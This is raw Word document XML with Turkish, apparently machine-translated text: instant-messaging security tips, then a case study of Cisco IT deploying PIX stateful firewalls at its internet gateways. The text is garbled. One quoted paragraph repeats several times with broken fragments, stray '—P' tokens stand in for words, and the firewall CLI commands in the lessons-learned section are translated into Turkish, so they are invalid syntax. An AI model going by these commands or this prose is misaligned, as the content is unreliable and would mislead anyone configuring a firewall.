        <w:t>Karayolu güvenliği veya telefondaki güvenlik gibi, IM'deki güvenlik, kullanıcıların ve kurumların çabalarının bir sonucu olacaktır. Bir kişi veya kurum tek başına hareket ederek güvenliği sağlayamadığından, aşağıdaki tavsiyeler rolle düzenlenmiştir. • Genel: —P, bağlantı ve sipariş arasındaki makul bir denge için AOL IM kayıt defterine bakın. —P, eksiksiz işlevsellik ve uçtan uca trafik gizleme için MS NetMeeting'e bakın. —P güvenilirlik ve özgünlük için işletme dizinlerine bakın. • İşletmeler için: — Uygun politikaları yayınlayın ve uygulayın. Kişisel kullanım, yazılım ve içeriği göz önünde bulundurun (tehdit edici, cinsel içerikli veya çirkin olanlar dahil). Özel bilgilerin sızıntısını göz önünde bulundurun. —P kurumsal IM istemcisi ve sunucu uygulaması ürünlerini gösterir. —Yalnızca yönetim tarafından seçilen ve güvenilir uygulamalardan, güvenilir kaynaklardan ve kurcalanmayacak ambalajdan yararlanı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P, güvenlik için kapalı ağlara ve şirket tarafından yönetilen sunuculara bakın. - Çevre veya ağ geçitlerinde kontrol trafiğini kontrol edin; uygun duvarlar ve proxy'ler kullanın. —Şirket dizinlerini kullanın. - Uzun parolalar isteyin. - Kurumsal veriler için doğrudan müşteriden-müşteriye bağlantılar ve uçtan uca şifreleme gerektirir veya tercih edin. - Trafik ve denetim trafiği ﬁ c; Düzenlemeyle cesareti kırılmadığı sürece, denetim tamamlandıktan sonra kütüğü imha edin. - Poliçe veya yönetmelik ile belirtilen yerlerde trafiği filtreleyin. • Ağ ve sunucu operatörleri için: —Uygun servis koşullarını yayınlayın ve uygulayın. —Bilgisayarları tek uygulama sistemleri olarak yapılandırın. —Sistemdeki geç değişikliklere izin vermeyin; script veya komut işlemcileri çalıştırmayın (“bot” yok). —P (bant dışı) sunucu kontrolleri için güvenli kanalı yönlendirir. - Kayıt veritabanı için ayrı bir cihaz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> düşünün. • Kullanıcılar için: </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İhtiyaçlarınızı karşılayan, işlevsel olarak en sınırlı müşteriyi kullanın. —P, AOL, MS Messenger ve Yahoo! Gibi popüler tüketici sistemlerini ifade eder. - Kullanım amacınıza uygun en sınırlı ayarları kullanın. - Yalnızca sizin zaten bildiklerinizden gelen mesajları ve diğer veri nesnelerini (örneğin, dosyalar, simgeler, görüntüler) kabul edin; varsayılan olarak diğer tüm trafiği engelle. - Gizliliğinizi kişileriniz için kullanım kolaylığına karşı dengelemek için kullanıcı adlarınızı seçin. Kapsamlı saldırılara karşı koymak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> için uzun parolalar kullanın. </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sadece gerekli verileri halka açık rehberlere yerleştirin. —Bir cevap modelini belirleyene kadar çoğu tercih için “bana sor” ayarını kullanın. - Beklenmeyen nesneleri kabul etmeyin; Beklenmeyen istemlere veya mesajlara cevap vermeyin. - Başkaları tarafından önerilen nesneleri veya metin dizelerini istemcinize girmeyin. • Ebeveynler ve veliler için: —Çocuklarınızın bağlantılarını bilin. —Küçük çocukların temaslarını tanıdıklarınızla sınırlamak için engelleme kontrolleri kullanın. • Çocuklar olgunlaştıkça mahremiyete karşı korumayı dengeleyi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rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="6" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="221" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="1"/>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Güvenlik Vaka Çalışması: Cisco IT, Cisco Internet Access Konumlarını Korumak İçin Güvenlik Duvarlarını Nasıl Kullanır?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="151" w:name="top"/>
      <w:bookmarkEnd w:id="151"/>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Cisco PIX Security Appliance, daha küçük İnternet ağ geçitlerinde durumsal güvenlik duvarı koruması sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="152" w:name="challenge"/>
      <w:bookmarkEnd w:id="152"/>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t> </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Systems®, verilerini ve ağını şirket içinde ve dışında yetkisiz kullanıcılardan korumaya büyük öncelik vermektedir. Uzun yıllardır kabul edilen çözüm, dünya çapında çok kanallı İnternet ağ geçitlerinin her birinde bir güvenlik duvarı kullanmaktı. Donanım veya yazılım tabanlı olabilen bir güvenlik duvarı ağ trafiğini inceler ve paketleri erişim kontrol listelerine (ACL'ler) ve inceleme kurallarına göre hedeflerine iletip iletmeyeceğine karar veri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Son zamanlarda Cisco® IT, uzaktan erişim VPN bağlantısını daha iyi desteklemek için veri merkezlerinde İnternet ağ geçitlerini dağıtmaya başladı. Uzaktan çalışan çalışanların, Internet üzerinden dolambaçlı yollardan paket göndermek yerine doğrudan en yakın Cisco VPN ağ geçidine bağlamak için şirket intranetine daha iyi erişimi gerekir. 2001'den 2004'e kadar Cisco IT, İnternet erişim noktalarının sayısını 5'ten 11'e yükseltti. Cisco IT, bu küçük ağ geçidi sitelerinde erişim güvenliği sağlamak için Cisco PIX® 535 Firewall'u seçti. Cisco PIX 525 Güvenlik Uygulaması kullanıma sunulduğunda, Cisco IT bunu tüm yeni İnternet ağ geçitlerinde dağıtmayı seçti, çünkü 525 tüm Cisco IT ihtiyaçlarını daha küçük bir formda destekledi. Cisco PIX güvenlik cihazında bulunan önemli bir avantaj, durumsal incelemedir. Durum denetimi yapan bir güvenlik duvarı, bir yönde geçen bir ağ bağlantısının durumunu hatırlar, böylece akış diğer yönde döndüğünde, güvenlik duvarı onu tanır ve hedefine iletir. Hasan Talukdar şöyle açıklıyor: “Ana bilgisayar A ile ana bilgisayar B arasında bir TCP bağlantımız olduğunu varsayalım. İlk paket akışının bir kaynak IP adresi ve bir hedef bağlantı noktası ve kimliği olacak. Trafik geri geldiğinde, kararsız güvenlik duvarı onu hatırlamaz ve bu nedenle izin verilip verilmediğini görmek için kurallara bakmak gerekir. Durum bilgisi olan bir bağlantı güvenlik duvarı, bunun tersine, geri dönüş trafiğini görmeyi ve kuralları kontrol etmeden, performansı iyileştirmeden ve ikinci bir ACL dizisi sağlama ihtiyacını ortadan kaldırmadan iletmeyi bekler. " güvenlik duvarı onu tanır ve hedefine iletir. Hasan Talukdar şöyle açıklıyor: “Ana bilgisayar A ile ana bilgisayar B arasında bir TCP bağlantımız olduğunu varsayalım. İlk paket akışının bir kaynak IP adresi ve bir hedef bağlantı noktası ve kimliği olacak. Trafik geri geldiğinde, kararsız güvenlik duvarı onu hatırlamaz ve bu nedenle izin verilip verilmediğini görmek için kurallara bakmak gerekir. Durum bilgisi olan bir bağlantı güvenlik duvarı, bunun tersine, geri dönüş trafiğini görmeyi ve kuralları kontrol etmeden, performansı iyileştirmeden ve ikinci bir ACL dizisi sağlama ihtiyacını ortadan kaldırmadan iletmeyi bekler. " güvenlik duvarı onu tanır ve hedefine iletir. Hasan Talukdar şöyle açıklıyor: “Ana bilgisayar A ile ana bilgisayar B arasında bir TCP bağlantımız olduğunu varsayalım. İlk paket akışının bir kaynak IP adresi ve bir hedef bağlantı noktası ve kimliği olacak. Trafik geri geldiğinde, kararsız güvenlik duvarı onu hatırlamaz ve bu nedenle izin verilip verilmediğini görmek için kurallara bakmak gerekir. Durum bilgisi olan bir bağlantı güvenlik duvarı, bunun tersine, geri dönüş trafiğini görmeyi ve kuralları kontrol etmeden, performansı iyileştirmeden ve ikinci bir ACL dizisi sağlama ihtiyacını ortadan kaldırmadan iletmeyi bekler. " Trafik geri geldiğinde, kararsız güvenlik duvarı onu hatırlamaz ve bu nedenle izin verilip verilmediğini görmek için kurallara bakmak gerekir. Durum bilgisi olan bir bağlantı güvenlik duvarı, bunun tersine, geri dönüş trafiğini görmeyi ve kuralları kontrol etmeden, performansı iyileştirmeden ve ikinci bir ACL dizisi sağlama ihtiyacını ortadan kaldırmadan iletmeyi bekler. " Trafik geri geldiğinde, kararsız güvenlik duvarı onu hatırlamaz ve bu nedenle izin verilip verilmediğini görmek için kurallara bakmak gerekir. Durum bilgisi olan bir bağlantı güvenlik duvarı, bunun tersine, geri dönüş trafiğini görmeyi ve kuralları kontrol etmeden, performansı iyileştirmeden ve ikinci bir ACL dizisi sağlama ihtiyacını ortadan kaldırmadan iletmeyi bekler. "</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 xml:space="preserve">Cisco'nun Cisco PIX güvenlik cihazını konuşlandırması için bir başka teşvik, durumsal denetleme güvenlik duvarları ile ilgili ancak bunlardan farklı bir durum olan durumsal yük devretme tarafından mümkün kılan gelişmiş uygulama kullanılabilirliği idi. Varlığın her noktasında (POP), Cisco'nun iki yedek Cisco yönlendiricisi vardı. Birincil yönlendirici başarısız olursa, ikincil otomatik olarak kontrol altına aldı; ancak, başarısız olduğunda birincil yönlendiriciden geçen paketler atılır. Bu gerçekleştiğinde, H.323 ve Oturum Başlatma Protokolü (SIP) gibi gecikmeye bağlı uygulamaları kullanan Cisco çalışanları, uygulamada gecikmeler yaşadı. “Cisco yönlendiricileri çok güvenilir ve çevremizde çok nadiren başarısız </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>olmak zorunda kaldı”. Talukdar, “Cisco BT'nin iş sürekliliğini sağlamaya yardımcı olmak için yapabileceği her şeyi yapıyoruz.</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bookmarkStart w:id="153" w:name="solution"/>
      <w:bookmarkEnd w:id="153"/>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>ÇÖZÜM</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IT, dünya çapındaki altı küçük POP'da durumsal bağlantı içeren bir güvenlik duvarı çözümü dağıtmaya karar verdi. Bu bölgelerdeki nispeten küçük kullanıcı popülasyonları için en büyük POP, 1600 çalışana hizmet verdi - Cisco, Cisco PIX 535 Güvenlik Uygulamasını seçti. Bu güvenlik cihazı, derin paket incelemesi gerçekleştirirken ve tüm ağ iletişimlerinin durumunu takip ederken yönetici tarafından tanımlanmış erişim kontrolü politikalarını uygulayarak güçlü ağ ve uygulama güvenliği sağlar. Talukdar, “Cisco PIX 535 Güvenlik Cihazı, yüksek hacimli Cisco ortamında önemli olan 280.000 eşzamanlı oturumu yönetme yeteneği ile 360 ​​Mbps'den fazla güvenlik duvarı verimi sağlıyor” diyor. Entegre donanım VPN hızlandırma özellikleri, güvenlik duvarı işlemcisinden hesaplama yoğun şifrelemeyi boşaltarak en yoğun trafik zamanlarında bile yüksek performans sağlar. Güvenlik duvarı çözümü, 70 Mbps'ye kadar Üçlü Veri Şifreleme Standardı (3DES) VPN ve 2000 IP Güvenliği (IPSec) tüneli desteği sağlayarak, on binlerce Cisco çalışanı, mobil çalışanı ve telefona bağlanan ortaklar için gereken ölçeklenebilirliği sağlar. VPN tarafından Cisco intraneti. Cisco PIX güvenlik cihazları, Cisco'nun Ağ Tabanlı Uygulama Tanıma (NBAR) gibi Cisco için uzmanlaşmış denetim motorlarını kullanarak, 4. ve 7. katlardaki paket akışlarını inceleyen akıllı, uygulamaya duyarlı güvenlik hizmetleri biçiminde ek bir güvenlik katmanı sağlar. popüler uygulamalarında solucanlar ve virüslerin yayılmasını engellemek için kullanı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Yeni durum denetlemesi güvenlik duvarı ile Cisco IT, yalnızca benzersiz gelen ve giden akışlar için bir ACL'yi yapılandırmaya ihtiyaç duyar. Cisco PIX işletim sisteminin bir parçası olan Uyarlamalı Güvenlik Algoritması (ASA), kaynak ve hedef adreslerine, rastgele TCP sıra numaralarına, port numaralarına ve ek TCP bayraklarına dayalı bir oturum akışı için bağlantı tablosu girişi oluşturur. Talukdar, “Bir akış bir yönde geldiğinde, güvenlik duvarı hatırlar ve geri gelmesini bekler” diyor Talukdar, Cisco PIX Security Appliance, tüm gelen ve giden trafiği bu güvenlik tablosu girişlerini bu bağlantı tablosu girişlerine uygulayarak kontrol ediyo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Geçiş Süreci</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yu Cisco IOS® Yazılımındaki kararsız güvenlik duvarından Cisco PIX Güvenlik Cihazına geçirmek için, Cisco IT aşağıdaki adımları izler:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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imariyi San Jose merkezindeki laboratuarda, geçiş yapılacak siteyle aynı yönlendirici, çekirdek ve omurgayı kullanarak inşa edin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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PIX güvenlik cihazlarını ACL ve kurallarla yapılandırın. Aşağıdakiler bir Cisco sitesi konfigürasyonundan alıntılardır. Kural setinin tamamı 1000 ila 2000 satır içerir. (Örnek IP adreslerinin burada kullanıldığını unutmayın.)</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Yapılandırmayı test edin. Talukdar, “Bu aşamada yapılandırma konularını keşfediyoruz” diyor. Yapılandırma sorunları Cisco Technical Assistance Center mühendislerinin yardımıyla çözüldü.</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Uygulamayı test edin. Cisco IT, konfigürasyonu sitenin halen kullandığı çözüme paralel olarak test eder - tipik olarak bir Cisco 7200 Serisi Router. Test cihazları, iki Cisco PIX güvenlik duvarını bağlamak ve uygun bağlantı ve yerine çalışmalarını onaylamak için çekirdek anahtarındaki boş bağlantı noktasını kullanır.</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lastRenderedPageBreak/>
        <w:t>Mevcut altyapıya paralel olarak Cisco PIX güvenlik duvarlarını üretime yerleştirin. Bu aşama genellikle yaklaşık iki hafta sürer veya Cisco IT uygulamasının dağıtımın istikrarlı olduğunu doğrulayana kadar.</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Zamanlanmış bir bakım penceresi sırasında Cisco PIX Güvenlik Cihazı sistemine geçiş yapın.</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Doğru çalışmayı onaylamak için altyapıyı bir hafta boyunca izleyin. Talukdar, “Güvenlik duvarlarının çok sayıda kuralı olduğu için bir veya ikisini özlemek kolaydır” diyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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IT’nin göç ettiği ilk siteler için, konsept kanıtı (1. ve 4. adımlar) 2 hafta sürdü, farklı ülkelerdeki nakliye ekipmanlarıyla ilgili sorunlar nedeniyle ekipman teslimatı 2 hafta sürdü ve gerçek geçiş toplam 6 hafta boyunca 2 hafta sürdü. haftala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Yapılandırma</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PIX Güvenlik Cihazı, çeşitli yöntemler kullanılarak yapılandırılabilir: Cisco PIX Aygıt Yöneticisi olarak adlandırılan entegre, Web tabanlı bir yönetim arayüzü; merkezi, politika temelli yönetim araçları; ve Telnet, Secure Shell (SSH) Protokolü veya bant dışı bir konsol portu kullanılarak erişilen bir komut satırı arayüzü (CLI). Kes ve yapıştır işlemi sırasında istemeden 10.000 satırlık bir yapılandırma dosyasından bir veya iki satırını bırakmaktan kaçınmak için Cisco, tüm kuralları bir dosyaya girer, kaydeder ve yapılandırmayı yükler. “Kuralları sadece bir kez yarattık; O zamandan beri, konfigürasyonu yeni bir site için güvenlik duvarlarına yüklemek sadece birkaç saniye sürüyor ”diyo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PIX Güvenlik Cihazı, Yönlendirme Bilgi Protokolü'nü (RIP) anlar ve şirketler bu protokolü kullanıyorsa rotaları dinamik olarak öğrenir. Ancak Cisco, Geliştirilmiş İç Ağ Geçidi Yönlendirme Protokolü'nü (EIGRP) kullanır. Bu nedenle, Cisco PIX 535 üzerinden trafiği yönlendirmek için Cisco, 5 ila 10 statik yol yapılandırdı. Cisco BT ağ mühendisi Jawahar Sivasankaran, “Statik yollar tasarımı basit tutar ve EIGRP yönlendirme alanına yeniden dağıtılmasını önler” diyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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bookmarkStart w:id="154" w:name="results"/>
      <w:bookmarkEnd w:id="154"/>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SONUÇLA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Yapılandırma süresi yarıya indirildi</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IT, durumsal denetimli bir güvenlik duvarına geçiş için birincil bir teşvik olan güvenlik duvarı yapılandırmalarını oluşturma ve değiştirme süresini azaltma hedeflerine ulaşmıştır. Talukdar “Cisco PIX Security Appliance, denetimli inceleme özelliğiyle, gelen ve giden trafik için ACL'deki giriş sayısını azaltarak BT yükünü en aza indiriyor” diyor Talukdar “Cisco PIX güvenliği nedeniyle önceki yükü yarı yarıya düşürdük. Cihazlar hem gelen hem de giden ACL'ler ve kurallar için dönüş trafiğine otomatik olarak izin verir. "</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PIX Güvenlik Cihazı ayrıca, Cisco güvenlik duvarları olarak gereksiz Cisco 7500 Series yönlendiricileri kullandığında, ikincil yönlendiriciyi ayrı olarak yapılandırma gereksinimini de ortadan kaldırır. Yedeklemeli iki Cisco PIX güvenlik duvarından yalnızca birinin yapılandırılması gerekir: Birincil güvenlik duvarı yapılandırması, yük devretme kablosu üzerinden otomatik olarak ikincil olarak kaydedilir. Talukdar, “Yapılandırmanın otomatik olarak kopyalanması, hata olasılığını azaltır ve idari ek masraflardan tasarruf sağlar” diyo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Yükseltilmiş güvenlik</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 xml:space="preserve">Cisco PIX Güvenlik Cihazı, Cisco ağının güvenliğini çeşitli şekillerde arttırır. TCP, UDP veya Internet İleti Kontrol Protokolü (ICMP) akışının durumunu hatırladığından, ağdan gelen </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>bir davetsiz misafirin başka bir akış eklemesini önler. Srinivasan, “Sağlam Adaptif Güvenlik Algoritmasının yanı sıra, TCP Intercept, TCP SYN çerezleri, DNS Guard, Flood Defender gibi yerleşik izinsiz giriş koruma özelliklerini kullanarak hizmet reddi ve hatalı paket saldırılarına karşı savunmaya yardımcı oluyor. Taşkın Koruma, Posta Koruma ve Tek Noktaya Yayın Ters Yol İletme. Ayrıca 59 farklı saldırı imzası arar. Bu saldırıları engelleyebilir ve yöneticilere gerçek zamanlı olarak onlar hakkında bilgi verebiliriz. "</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Yüksek kullanılabilirlik</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irincil Cisco PIX Güvenlik Cihazı herhangi bir nedenle başarısız olursa, ikincil cihaz hiçbir paketin kaybolmaması için kontrolü ele alır. Cisco kullanıcıları uygulama hatalarını görmezler ve çalışmaları kesintisiz kalı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PIX Security Appliance'ın kullanılabilirliği sağlamasının bir başka yolu Port Adres Çevirisi (PAT) işlevini özel bir ağ geçidinden daha verimli bir şekilde gerçekleştirmektir. Talukdar, “PAT için Cisco PIX Güvenlik Cihazını kullanmaya başladığımızdan beri, bellek veya kaynak sorunlarıyla ilgili tek bir kesinti yaşamadık” diyo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r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Azaltılmış Raf Alanı Gereksinimleri</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Cisco, daha yeni uygulamalarda Cisco 7200 Serisi yönlendiricileri daha küçük Cisco PIX 525 Güvenlik Cihazı ile değiştirerek veri merkezi raf alanı gereksinimlerini azaltmıştır. “Cisco PIX 525 Güvenlik Cihazı, önceki yönlendirici için üç raf ünitesine kıyasla iki raf ünitesidir” diyor Talukdar. “Raf alanının birinci sınıf olduğu veri merkezimizde bu önemli.” Diyor.</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bookmarkStart w:id="155" w:name="lessons"/>
      <w:bookmarkEnd w:id="155"/>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>DERSLER ÖĞRENİLDİ</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el Aviv’deki dağıtım sırasında Cisco ekibi şunları kaydetti:</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Message Digest Algorithm 5 (MD5) kimlik doğrulamasını kullanarak Cisco PIX güvenlik cihazı aracılığıyla iki yönlendirici arasında Sınır Ağ Geçidi Protokolü (BGP) komşularının yapılandırılması gerekiyorsa, güvenlik duvarı MD5 kimlik doğrulama paketleri için sıra numaralarını rasgele olarak belirler. Bu nedenle, komşuların şifreleri uyuşmuyo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alukdar, “Kaynak IP adresi için statik Ağ Adresi Çevirisi (NAT) etkinleştirerek ve Cisco PIX güvenlik duvarı için statik NAT komutunda norandomseq anahtar sözcüğünü kullanarak bir geçici çözüm oluşturduk,” diyor Talukdar. global NAT içinde komut içinde değiştiriliyor. " Cisco PIX Security Appliance, iç ağda 172.16.0.0 IP adresine sahip, yönlendirici A ile güvenlik duvarı dışında bir IP adresine sahip olan yönlendirici B arasında dağıtılmışsa, şu çözüm uygulanı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nat (inside) 0 erişim listesi olmayan</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statik (içeride, dışarıda) 172.16.0.0 172.16.0.0 ağ maskesi 255.255.255.255 0 0 norandomseq</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rişim-list nonat inkar ip ana 172.16.0.0 herhangi</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erişim-list nonat herhangi bir ip izin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="156" w:name="nextsteps"/>
      <w:bookmarkEnd w:id="156"/>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>SONRAKİ ADIMLAR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:before="5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 xml:space="preserve">Uzun vadeli planlar arasında Cisco PIX güvenlik cihazlarının diğer Cisco lokasyonlarındaki benzerlerine teslim edilmemesine izin veriliyor. “İnternet bağlantısı kesilirse, Cisco PIX </w:t>
      </w:r>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>güvenlik duvarı hala farkında değil” diyor Talukdar. “Bu nedenle, İnternet için tasarlanan paketler İnternet ağ geçidine kadar uzanıyor, yalnızca bırakılmak üzere. Bir konum yalnızca bir ISS bağlantısına sahipse, şu anda alternatif yok. " KOK'lar arasında fazladan bir rota sağlamak için Cisco IT, ISP ağ geçitlerinin şartlı rotaların reklamını yapmak için kullanabileceği farklı gelişmiş BGP özelliklerine bakıyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="254" w:lineRule="atLeast"/>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Talukdar, “Cisco PIX Güvenlik Uygulaması, küçük POP ortamında iş sürekliliği ve basitleştirilmiş yönetim hedeflerimizi gerçekleştirmemize yardımcı oldu” diyor. “FWSM [firewall services module] ile aynı avantajları en büyük sitelerimize de genişleteceğiz. "</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Deploying Host-Based Firewalls across the Enterprise: A Case Study</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001103A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001103A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
